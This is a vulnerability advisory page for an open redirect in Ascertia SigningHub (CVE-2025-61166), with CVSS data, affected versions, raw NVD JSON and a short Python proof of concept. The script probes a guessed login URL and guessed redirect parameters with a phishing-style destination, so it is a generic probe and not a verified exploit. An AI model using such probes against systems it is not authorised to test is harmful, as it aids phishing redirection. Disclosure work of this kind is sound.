Security Vulnerability Report
中文
CVE-2025-61166 CVSS 6.1 MEDIUM

CVE-2025-61166

Published: 2026-04-06 18:16:41
Last Modified: 2026-04-10 18:40:32

Description

An open redirect in Ascertia SigningHub User v10.0 allows attackers to redirect users to a malicious site via a crafted URL.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ascertia:signinghub:8.6.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ascertia:signinghub:10.0:*:*:*:*:*:*:* - VULNERABLE
Ascertia SigningHub User v10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-61166 Open Redirect Vulnerability # Target: Ascertia SigningHub User v10.0 import requests def check_open_redirect(target_host, malicious_url): # Common vulnerable parameter names for redirect functionality params_list = ['returnUrl', 'redirect', 'next', 'url', 'return', 'goto'] for param in params_list: # Construct the full URL full_url = f"{target_host}/login" # Assuming login page is the entry point payload = {param: malicious_url} try: # Send request, do not follow redirects automatically to check the Location header response = requests.get(full_url, params=payload, timeout=5, allow_redirects=False) # Check if the response is a 302/301 Redirect and the Location points to the malicious site if response.status_code in [301, 302, 307, 308]: location = response.headers.get('Location', '') if malicious_url in location: print(f"[+] Vulnerability confirmed using parameter '{param}'") print(f"[+] Redirecting to: {location}") return True except requests.RequestException as e: print(f"[-] Error connecting to {target_host}: {e}") return False if __name__ == "__main__": target = "https://target-signinghub.com" evil_site = "https://example.com/phishing" check_open_redirect(target, evil_site)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61166", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:41.070", "lastModified": "2026-04-10T18:40:32.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An open redirect in Ascertia SigningHub User v10.0 allows attackers to redirect users to a malicious site via a crafted URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ascertia:signinghub:8.6.8:*:*:*:*:*:*:*", "matchCriteriaId": "283658A8-3C4B-435F-9CAD-89CFD8DD7622"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ascertia:signinghub:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "AEF66392-2606-4208-85FF-0C8AEB806AC0"}]}]}], "references": [{"url": "https://linkedin.com/in/thakur-nikhil", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://medium.com/@rajput.thakur/malicious-open-redirection-cve-2025-61166-bf5d708cd241", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}